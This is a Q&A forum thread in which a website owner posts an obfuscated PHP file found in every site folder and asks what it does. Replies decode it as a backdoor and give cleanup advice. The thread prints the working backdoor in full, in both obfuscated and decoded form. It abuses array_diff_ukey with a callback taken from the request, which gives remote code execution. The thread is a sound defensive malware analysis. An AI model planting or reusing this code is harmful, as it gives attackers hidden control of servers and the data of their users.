0

Here is the PHP script I have found at the root of each of my website folder. Script name is fcb.php

Content is :

<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>

Can somebody explain what this does? Thanks.

Julien PhuketMyMac
  • 11
  • 2
  • grep -R "Array(base64_decode" /path/to/root find all files contains this code and remove it from files. BTW, you must have to correct files/folders permissions, stop script execution in upload/image/static directories. Take a look of Apache logs to find how it is uploaded to your files. – Vaibhav Panmand Mar 31 '16 at 05:38
  • @VaibhavPanmand After a suspected breach, one does not simply `rm` a select few of the malicious files and go about one's business... (In case it isn't obvious, *you reinstall the bloody thing from scratch* because you can never be sure to find and revert all malicious changes on a comprised system.) – n.st Mar 31 '16 at 07:09
  • Hmm, I was scared I would have to reinstall the system. I think that this is also the safest way but I need to understand how it came in first or this will happen again. Thanks all for your answers. – Julien PhuketMyMac Mar 31 '16 at 07:20
  • Possible duplicate of [How do I deal with a compromised server?](http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – kasperd Apr 03 '16 at 10:54

1 Answers1

2

It certainly looks like malware of some sort. My PHP is rusty; as far as I can unscramble it, it winds up looking like this:

<?php array_diff_ukey(@array((string)$_REQUEST[password]=>1), @array((string)stripslashes($_REQUEST[re_password])=>2), $_REQUEST[login]); ?>

Then, searching for what "stripslashes $_request re_password" does in Google led me to a lot of sites warning about PHP backdoors.

DarkMoon
  • 1,039
  • 13
  • 29